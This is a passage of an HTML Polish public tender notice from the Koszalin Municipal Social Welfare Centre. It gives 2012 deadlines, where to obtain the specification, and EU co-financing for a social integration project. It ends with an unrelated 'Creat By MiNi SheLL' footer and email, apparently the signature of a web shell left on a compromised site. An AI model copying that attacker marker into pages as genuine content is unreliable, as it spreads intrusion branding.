- dopuszcza się możliwość zmniejszenia liczby godzin świadczenia usług w ramach działań A, D, E, F, G, H, K, L, M, N, P w przypadku braku zapotrzebowania ze strony uczestników projektu; jednak nie więcej niż o 10% docelowej liczby godzin, określonej w SIWZ.
W powyższych przypadkach wynagrodzenie Wykonawcy za realizację działania ulegnie proporcjonalnemu zmniejszeniu, stosownie do liczby osób skierowanych i lub godzin świadczenia usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mops.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia do nabycia w siedzibie Miejskiego Ośrodka Pomocy Społecznej w Koszalinie przy Al. Monte Cassino 2 pok. 07..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej Al. Monte Cassino 2  75-412 Koszalin
Pokój nr 20 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Koszaliński Program Integracji Społecznej- START, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com